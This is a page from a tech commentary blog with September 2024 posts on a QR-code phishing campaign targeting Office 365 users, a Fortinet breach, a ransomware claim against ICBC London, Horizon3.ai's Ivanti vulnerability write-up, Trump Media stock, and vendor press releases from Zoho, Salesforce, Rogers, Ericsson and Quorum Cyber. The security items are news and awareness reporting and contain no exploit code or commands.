Fortra Discovers Sophisticated QR Code Phishing Campaign That Targets Office 365 Users

Posted in Commentary with tags on September 15, 2024 by itnerd

Global cybersecurity software and solutions provider Fortra has discovered a sophisticated QR code phishing campaign specifically targeting Microsoft Office 365 users across various industries, including finance and healthcare. In this campaign, employees are tricked into scanning a QR code sent through a blank email. That code redirects them to a highly personalized phishing page tailored to look like their company’s Office 365 login portal.

Now at this time, I don’t have a link to send you to read this document on for yourself. But here’s how the campaign works:

  • The target, because this is a targeted attack, gets an email that contains a PDF. The PDF claims it is an “Enhanced Bonus Distribution Strategy” from HR and requests that the user scan a QR code to access the document.
  • Embedded in the QR code was a phishing redirect link that takes the user to a fake Microsoft Identity Verification Check. Upon analyzing the source code of this page, it was discovered two base64 encoded strings. One decoded string is a URL for a site hosting an email list with n290,000 emails in it, and the other goes to the Office365 phishing attack. It was also discovered in the same code that if the users email address is in the email list, they are permitted to continue to the next part of the phish.
  • The background of the Office365 phishing site changes to reflect the company name based on the users email domain. If the users email address is not found in the list, they are given four chances to input their email and then redirected to a random Wikipedia article. The user is given four chances so the attacker can harvest extra email addresses.

Why this matters:

  • QR code phishing attacks are becoming more prevalent due to the reliance on remote and hybrid work environments, which often use QR codes for authentication, document sharing, and security. While often perceived as convenient or harmless, they are now being weaponized to bypass traditional email security measures.
  • The phishing campaign was designed specifically to exploit Office 365, a platform used by over a million companies globally. With over 290,000 email addresses targeted in this attack, this finding represents a major security risk for companies relying on Office 365.
  • The high level of personalization in the phishing attacks can easily trick even trained employees, increasing the risk of credential theft and data breaches.
  • QR codes are under the radar for many cybersecurity protocols, as most rely on anti-phishing tools that scan links in emails, creating blind spots for security teams.

Thus the take home message is that scanning QR codes is becoming a risky endeavour. Thus if you get one from via email from someone that you don’t know, or that you don’t expect, your best course of action is to perhaps delete it and report it to your IT department as it might be dangerous.

1 Comment »

Fortinet Pwned Via Third-Party Attack 

Posted in Commentary with tags on September 14, 2024 by itnerd

Fortinet has just disclosed that it has suffered a data breach after a threat actor gained unauthorized access to a third-party it used.

Initially, the data breach at Fortinet was detected on a hacking forum, with the threat actor claiming that their Azure SharePoint was leaked, with 440 GB of data. This is part of what the company said:

An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers.

Evan Dornbush, former NSA cybersecurity expert had this to say:

Modern business IT ecosystems are complex, relying on external providers and a hodgepodge of “shared responsibility” agreements as pertains to security. So long as the data is valuable, attackers will take interest.

This could become an interesting 8-k as the breach is Fortinet’s material event (as defined by the SEC) even if the customer data was stored on a third-party platform. As of the time of this writing how the access occurred has not been disclosed (at least I haven’t been able to find it).

Ted Miracco, CEO, Approov follows with this:

  “Data centers are now as vital as power plants—meaning tighter security, more government oversight, and faster responses to cyber threats. Expect more scrutiny, but also more investment in the sector. This recognition highlights the critical role that data centers play in supporting the healthcare, finance, and broader public services sectors of the economy, particularly in light of growing cyber threats and the increasing reliance on digital infrastructure.

  “Though good for security and investment, this could hamper innovation with over-regulation. It’s a necessary step, but bureaucratic hurdles could be an issue. Given that data centers house sensitive information, such as NHS patient records and financial data, their inclusion in CNI status means they will receive prioritized access to security resources like the National Cyber Security Centre (NCSC). This added layer of oversight and support can improve incident response, reduce downtime, and protect critical data during outages or attacks.

  “The move should improve overall resilience against attacks, but unless the private sector steps up on security innovation, it may not stop the next big breach. Cybersecurity vendors, especially those providing robust API and cloud security solutions may see this development as an opportunity to expand into the CNI-protected sectors by offering more advanced security services tailored for data centers.”

Finally Stephen Gates, Principal Security SME, Horizon3.ai:

  “As someone deeply motivated by security, I see this as a crucial step in safeguarding citizens, public and private sector organizations, and the nation as a whole. Today’s critical infrastructures—such as energy, water, and emergency services, and so on—already rely heavily on the continuous operation of the nation’s data centres.

  “With these data centres now being classified similar to other critical infrastructure, they will likely be subject to the same regulations and directives designed to protect private data, ensure operational uptime, and demonstrate cyber resilience. Additionally, the need for continuous cyber risk assessments of these environments will be imperative to identifying cyber risks, mitigating emerging threats, and ensuring that these centres remain resilient against evolving cyberattacks.”

Clearly Fortinet are trying to minimize the scope of this as 440 GB doesn’t sound like a “limited number of files” to me. That likely means that this is pretty bad. And when the details finally appear, we won’t like the scope of this hack at all.

Leave a comment »

5.2 Million Files Allegedly Stolen From ICBC’s London HQ

Posted in Commentary with tags on September 14, 2024 by itnerd

On Thursday, ransomware gang Hunters International claimed to have stolen more than 5.2 million files from the London branch of the Industrial and Commercial Bank of China (ICBC).

The threat actors allegedly swiped 6.6 TB of the bank’s data after hacking their network, and threatened to publish all of it unless ICBC pays up by September 13th. Which was yesterday.

ICBC is the world’s largest bank by assets, and, almost a year ago, the US arm of ICBC was hit by ransomware that disrupted trading in the US treasury markets. LockBit told Reuters that the bank paid the ransom after that attack.

Comparitech researchers logged 127 ransomware attacks claimed by Hunters so far in 2024, but these haven’t been acknowledged by the targets.

I have two comments on this. Starting with Evan Dornbush, former NSA cybersecurity expert:

“Is there a more cost-effective way to fight ransomware?

  “This is a timely reminder that organizations should continually question the effectiveness of their cybersecurity measures lest they too be caught in a vicious cycle of reactive spending while failing to address the root causes of these attacks.

  “Simply throwing money at security solutions isn’t enough. This may be an ideal time for the industry to consider a shift in focus towards disrupting the economic model of ransomware attackers rather than dealing with the effects of their crimes.”

Next up is Ted Miracco, CEO, Approov:

Privacy, security and possible culprit behind the attack:

  • Privacy – Financial institutions are custodians of highly sensitive data, and a breach of this magnitude could result in heavy fines and penalties, as well as lawsuits from affected customers and businesses. If Hunters publishes ICBC’s data, it will lead to severe legal and compliance breaches, especially in regions with stringent financial and data privacy regulations, such as the EU’s GDPR or the UK’s Data Protection Act.
  • Security – The attack by Hunters underscores the prevalence of ransomware-as-a-service (RaaS), where groups like this operate with increasing efficiency. The involvement of RaaS models lowers the bar for cybercriminals, enabling them to outsource sophisticated ransomware attacks and focus on large, lucrative targets such as banks. A key part of protecting financial data involves strengthening the security of mobile applications and APIs, which are often targeted as points of entry for ransomware attacks. However, organizations have demonstrated their capability to compromise even large and presumably secure institutions like ICBC, because API security vulnerabilities remain largely unaddressed.
  • Culprit? – The fact that Hunters does not target Russian organizations suggests a potential association with Russia’s safe harbor policy for cybercriminals operating within its borders. This geopolitical dynamic is common with ransomware gangs, especially those with links to Russia, which often avoid targeting domestic organizations to stay under government protection. Ransomware attacks focused on extortion for financial gain, are a hallmark of many Russia-based cybercrime.”

ICBC has paid ransoms before. And my feeling is that they will pay up this time around. That’s unfortunate as I believe that organizations should not pay ransoms under any circumstances because that only encourages threat actors to launch more attacks. Besides, that money would likely be better spent ensuring that they do not pwned in the first place.

Leave a comment »

Horizon3.ai Releases A Deep Dive On An Ivanti Vulnerability

Posted in Commentary with tags on September 14, 2024 by itnerd

Horizon3.ai Exploit Developer James Horseman has just published “CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability” and posted a proof of concept exploit.

“Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On September 12th, 2024, ZDI and Ivanti released an advisory describing a deserialization vulnerability resulting in remote code execution with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability. Our POC can be found here. We would like to credit @SinSinology with the discovery of this vulnerability.”

In addition to his detailed examination of the vulnerability and the vulnerability proof of concept, James also looks at the two main fixes he found in the patched version of EPM, and offers some caveats.

CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability: https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-dive-ivanti-endpoint-manager-agentportal-deserialization-of-untrusted-data-remote-code-execution-vulnerability/

Leave a comment »

Trump Says He Won’t Sell Truth Social Stake… Stock Soars

Posted in Commentary with tags on September 14, 2024 by itnerd

We’ve been speculating what Donald Trump will do with his stake in Trump Media. Will he hold onto the stock or sell it to pay for his various “problems”.

Here’s the answer:

Trump Media & Technology Group, the social media business owned by former president Donald Trump, surged on Friday after Trump said he has “absolutely no intention of selling” his stake in the Truth Social owner.

And:

“A lot of people think the reason it’s down is a lot of people think I’m going to sell, and if I sell, it’s not going to be the same,” Trump said. “But I have absolutely no intention of selling.”

That caused the stock to do this:

That’s still over 70% below what it started trading at. But it’s the first positive news that the stock has had in a while. But it wasn’t all good news for Trump. He had a bit of a meltdown in the style of a two year old because of this:

Trump’s declaration prompted the stock to go parabolic. Not surprisingly, NASDAQ stopped trading on the security, which is standard practice when a stock’s price experiences huge swings in one direction or another. Trading was halted twice, each for five minutes. The security was one of dozens of listings on the exchange to be halted on Friday.

In response, the ex-president went on Truth Social to express his bewilderment and to threaten the operators of the exchange:

Seriously, this guy has lost the plot, lost his mind, is a couple fries short of a Happy Meal. Pick the metaphor that works for you or leave one in the comments. The point is that for a guy who claims he understands business, this is a massive over reaction to a pair of very brief trading halts that happen all the time. And he did this on a good news day for his stock. Though as I mentioned he’s still underwater from where the stock started trading at.

Mark my words, this will be short lived. Something will happen either with the election, or with his numerous criminal proceedings or civil proceedings that will trigger him to sell this stock to get money in a hurry. And this will cause the stock to crash. I’m calling now, this is not over.

1 Comment »

Zoho Launches AI-Rich, Highly Extendable Version of Zoho Analytics, Democratizing Self-Service BI to Any Persona or Business

Posted in Commentary with tags on September 13, 2024 by itnerd

Zoho Corporation, a leading global technology company, today launched a new version of Zoho Analytics-Zoho’s self-service BI and analytics platform. Among more than 100 other enhancements, Zoho Analytics has developed powerful new AI and ML capabilities, enabling diagnostic insights, predictive analysis, and automated report and dashboard generation.

Additional advancements to Zoho Analytics include a custom ML model-building studio, seamless integration with Open AI, 25+ new data connectors, and third-party BI platform extensions. The new version of Zoho Analytics has added power, intelligence, and flexibility to serve a broader range of businesses and users than competitors in the market.

The latest version of Zoho Analytics has advanced across four key areas: Data Management, AI, Data Science & Machine Learning, and Extensibility. Below are notable highlights of the platform across these four categories. 

Data Management Hub 

Zoho Analytics has expanded its data management capabilities, adding Stream Analytics, ETL data pipelines, and metrics-layer enhancements to ensure broader access to more accurate data for businesses. Key data management additions to Zoho Analytics are as follows: 

  • Zoho Analytics has expanded its 500+ data connector portfolio by adding Stream Analytics, along with 25 other new data connectors.
  • Business users can now create and manage complex ETL data pipelines within the platform, specifically through the following actions:
    • Create end-to-end data pipelines using Zoho Analytics’ visual builder
    • Build Custom Transforms and ML models using the platform’s Python Code Studio
    • Transform data using natural language with Zoho’s AI assistant, Ask Zia
    • Access robust data management with an automatic versioning system and a new Sandbox environment
    • Orchestrate data pipelines using Zoho Flow
  • New Unified Metrics Layer enables users to define, standardize, monitor, access control, and catalog all business metrics in a single pane. The platform also extends to serve in a Headless BI mode, allowing data apps to consume the same metrics in real time for consistent and dependable insights.

BI Infused with Generative AI

Zoho Analytics has introduced Generative AI capabilities across the BI platform to accelerate the adoption of insights for a broad spectrum of user personas. The following AI-powered enhancements deliver more efficient, contextual, accessible, and intelligent insights and actions to the platform:

  • Diagnostic Analysis: Zoho’s AI-powered, automated insights engine, Zia Insights, now provides diagnostic analytics contextually, bringing decision intelligence into the platform.
  • Ask Zia, Zoho’s multi-lingual Natural Language Querying AI copilot, has been enhanced, allowing users to trigger actions and build custom data models. Users can now converse with Ask Zia within IM channels, including Microsoft Teams, to generate deeper, faster, and more contextual insights and actions.
  • Zoho Analytics has added Auto Analysis, enabling AI-powered automated metrics, report, and dashboard generation.
  • Zoho Analytics’ seamless Open AI integration-enabled by Retrieval-Augmented Generation (RAG)-drives more relevant and accurate query responses. Using Open AI APIs with BYOK, users can more easily find public datasets and create formula & SQL queries. 

Data Science and Machine Learning Studio

Zoho Analytics now features the Data Science and Machine Learning (DSML) Studio, supporting users to build custom machine learning models for specific business requirements. DSML Studio offers the following capabilities: 

  • DSML Studio offers AutoML, a no-code assistant, to build custom ML models easily. With feature engineering, hyperparameter tuning, and comprehensive model analysis, it enables users to train, test, compare, deploy, and manage models. 
  • Zoho Analytics also features Code Studio, the platform’s new integrated Python code environment where users can create custom ML models, as well as import Python models or externally built libraries, which can be executed within the platform. 

Platform Extensibility 

Zoho Analytics is more deeply extendable, adding new capabilities such as its no-code

builder for data connectors, actions framework, BI fabric, and client SDKs. Zoho Analytics is a composable platform on which any analytical solution can be built. The following are additional key extendability developments: 

  • Zoho Analytics’ new BI fabric enables businesses to consolidate insights from multiple BI platforms, such as Power BI and Tableau, onto one, easily accessible and searchable analytics portal. Access to the portal can be controlled with fine- grained access permissions.
  • Within Zoho Analytics, users can trigger actionable workflows, including URL and Webhook actions. The platform integrates seamlessly with Zoho Flow, enabling 500+ app triggers.
  • Zoho Analytics features a no-code data connector builder, allowing users to create custom connectors, to bring data from any custom application. sPartners can also build data connectors that can be published and sold on Zoho Marketplace. 

The new Zoho Analytics release features over 100+ updates, including new visualizations, enhanced dashboard building, audit and admin controls, revamped mobile apps, Right-to-Left (RTL) support, and more.

Pricing and Availability 

The New Version of Zoho Analytics is available immediately. For information on pricing, please visit: http://www.zoho.com/analytics/pricing.html

Leave a comment »

Salesforce unveils groundbreaking Agentforce platform

Posted in Commentary with tags on September 13, 2024 by itnerd

Recently, Salesforce found an estimated 41% of employee time being spent on repetitive, low-impact work. 

To answer this, Salesforce has launched its new autonomous agent platform, Agentforce, providing relief to overstretched teams. 

In contrast to now-outdated copilots and chatbots that rely on human inputs and struggle with complex tasks, Agentforce offers a new level of sophistication by operating autonomously, retrieving the right data on demand, building action plans for any task, and executing these plans without requiring human intervention. Like a self-driving car, Agentforce uses real-time data to adapt to changing conditions and operates independently within an organizations’ customized guardrails. 

Why Agentforce is a Game-Changer:

  • Autonomous Operation: Unlike traditional tools, Agentforce’s AI agents work 24/7 with full autonomy, delivering precise and immediate responses without needing human input.
  • User-Friendly Deployment: Deploy advanced AI agents swiftly with low-code functionality, using pre-built templates and natural language commands—no technical expertise required.
  • Seamless Data Integration: Agentforce integrates smoothly with existing company and customer data, including systems like Workday, ensuring agents have the relevant information to drive success.
  • Operational Scale: By blending AI, data, and action, Agentforce brings massive operational scale and transforms workflows across every industry, role, and department.

Agentforce for Service will be generally available on October 25, 2024. Some components of the Atlas Reasoning Engine launch in February 2025. Agentforce pricing starts at $2 per conversation; standard volume discounts apply.

Explore Agentforce.com here.

Leave a comment »

Rogers to Offer All-New iPhones, Apple Watches, And AirPods

Posted in Commentary with tags on September 13, 2024 by itnerd

Rogers will offer iPhone 16 and iPhone 16 Plus, which are built for Apple Intelligence with the all-new A18 chip, Camera Control, powerful upgrades to the advanced camera system, the Action button to quickly access useful features, and a big boost in battery life; iPhone 16 Pro and iPhone 16 Pro Max are powered by the A18 Pro chip and built for Apple Intelligence, featuring larger display sizes, Camera Control, innovative pro camera features, and a huge leap in battery life; Apple Watch Series 10, the thinnest Apple Watch yet, featuring the biggest, most advanced display of any Apple Watch, faster charging, water depth and temperature sensing, and the breakthrough health and fitness insights of watchOS 11; Apple Watch Ultra 2 in a stunning new black finish alongside a new Titanium Milanese Loop band; and a groundbreaking new lineup of AirPods models and features, including a brand-new design for AirPods 4.

Switch to Canada’s largest and most reliable 5G network with the iPhone 16 lineup. Rogers covers over 2,300 communities across the country and is now #1 in awards for Canada’s most reliable mobile network as awarded by umlaut and Opensignal. Enjoy great savings with Rogers when you trade-in an eligible iPhone for the new iPhone 16 lineup. And with select 5G plans, you can enjoy promo credits when you finance your iPhone 16 and iPhone 16 Pro, as well as special offers for connected devices.

iPhone 16 and iPhone 16 Pro models can be activated with an eSIM, a more secure alternative to a physical SIM card. With eSIM, users can quickly activate their cellular plan, store multiple cellular plans on the same device, and stay connected. Rogers supports eSIM Quick Transfer which allows users to transfer their existing plan to their new iPhone, and with eSIM Carrier Activation Rogers can digitally assign a user’s eSIM directly to their iPhone.

For more details on pricing and data plans, please visit rogers.com.

For more details on Apple products, please visit www.apple.com.

Leave a comment »

Ericsson unveils strategy for enterprise-driven 5G network adoption

Posted in Commentary with tags on September 12, 2024 by itnerd

Ericsson today announced its Enterprise 5G strategy that includes Private 5G and neutral host 5G solutions, designed to deliver business-critical connectivity across operational and public-facing enterprise environments. These innovative solutions enable both carpeted and industrial enterprises to advance innovation, safety, and operational efficiencies.

The Ericsson Enterprise 5G portfolio includes three solutions:

  • Ericsson Private 5G: A converged 4G/5G private cellular solution with industry and licensed spectrum support, offering flexible deployment models and best-in-class coverage, mobility, security, and latency.
  • Ericsson Private 5G Compact: A U.S. CBRS-based offering designed for enterprises that need robust connectivity in environments where Wi-Fi falls short, leveraging a simplified radio architecture (Previously branded as Cradlepoint NetCloud Private Networks).
  • Ericsson Enterprise 5G Coverage: A best-in-class neutral host solution, currently certified by all major U.S. carriers, that offers a simplified and scalable architecture compared to legacy DAS, resulting in attractive total cost of ownership for enterprises.

The Enterprise 5G portfolio leverages the broader Ericsson radio access network (RAN) portfolio, including the Radio Dot System for indoor deployments and small cell radios for outdoor. Acquisition costs are reduced through simplified subscription-based packaging with optional services and feature add-ons. Additionally, Ericsson has focused resources on pre- and post-sales support, including vertical expertise and training for channel partners which allows enterprise customers to focus on their business outcomes and innovation.

Customers can look forward to deploying and managing any solution in Ericsson’s Enterprise Wireless portfolio (Enterprise 5G, Wireless WAN, and SASE) under NetCloud Manager, a comprehensive cloud management and orchestration platform. Ericsson’s innovations remove the complexity that enterprise customers are challenged with when wanting to leverage the power of 5G:

  • Simplified deployments with seamless provisioning and configuration capabilities, unified policy management, and single-pane-of-glass visibility across the network.
  • Effortless enterprise 5G network operations, leveraging AIOps to turn visibility into actionable insights for enhancing performance. 
  • Streamlined lifecycle management making it easy to update, upgrade, and expand.
  • Innovative features driving business outcomes such as indoor 5G positioning to locate assets with high accuracy.

In a separate announcement, Ericsson also announced the new networked devices that complement private LTE, 5G, and coverage extension solutions for reliable connectivity where wired networking is unavailable or ineffective.

Leave a comment »

Quorum Cyber Announces Strategic Acquisition of Difenda

Posted in Commentary with tags , on September 12, 2024 by itnerd

Quorum Cyber – with offices in Edinburgh, UK, and Tampa, Florida – today announced the acquisition of Difenda, a Canadian-based, full-stack Microsoft Security Managed Services company. The announcement underscores Quorum Cyber’s global momentum and strengthens its position as a leader of Microsoft Security services. 

Since 2008, Difenda has grown to over 80 employees and serves a diverse range of customers across the manufacturing, financial services, energy, retail, technology, and healthcare industries. A Microsoft Solutions Partner for Security, the company has a growing customer base in the United States and Canada, with offices in Oakville, Ontario, and Goodyear, Arizona. 

With Difenda’s strong foothold in the North American market, today’s acquisition aligns with Quorum Cyber’s strategic objective to accelerate its global expansion and scale meaningfully into new regions. Simultaneously, joining Quorum Cyber will enable Difenda to deliver more value, new and enhanced services, and more Microsoft innovations for customers.

Today’s news follows Quorum Cyber’s significant investment from Boston-based private equity firm Charlesbank Capital Partners earlier this year. Charlesbank’s investment, support from existing investment partner Livingbridge, and the addition of Difenda arm Quorum Cyber with the firepower to take the business to new heights. 

About Quorum Cyber

Founded in Edinburgh in 2016, Quorum Cyber is one of the fastest-growing cyber security companies in the UK and North America with over 150 customers on four continents. Its mission is to help good people win and it does this by defending teams and organisations across the world and all industry sectors against the rising threat of cyber-attacks, enabling them to thrive in an increasingly hostile, unpredictable, and fast-changing digital landscape. Quorum Cyber is a Microsoft Solutions Partner for Security, a member of the Microsoft Intelligent Security Association (MISA), and a 2024 Microsoft Security Partner of the Year finalist. For more information, please visit www.quorumcyber.com or contact info@quorumcyber.com.

About Difenda

Difenda, headquartered in Oakville, Ontario, Canada, is a privately held Sec-Ops-As-A-Service company founded in 2008 that takes a “Cybersecurity-First, Microsoft-Always” approach to solve today’s toughest cybersecurity challenges. Focused on customer driven outcomes, Difenda delivers 24/7/365 security operations backed by modernized PCI, SOC 2 Type II, and ISO 27001 certified Cyber Command Centers (C3). As the winner of the 2023 Microsoft Security Impact Award and 2024 Microsoft Security Partner of the Year finalist, Difenda stands as a trusted provider of Microsoft Security services. The company has a tenured history as one of the first MSSPs to join the Microsoft Intelligent Security Association (MISA). Difenda belongs to an elite list of Microsoft Security Solutions Partners who hold Advanced Specializations in Cloud Security and Threat Protection, and having also achieved Microsoft Verified Managed XDR Solution status. For more information, visit www.difenda.com or contact www.difenda.com/get-started/.  

Leave a comment »

« Older Entries
Newer Entries »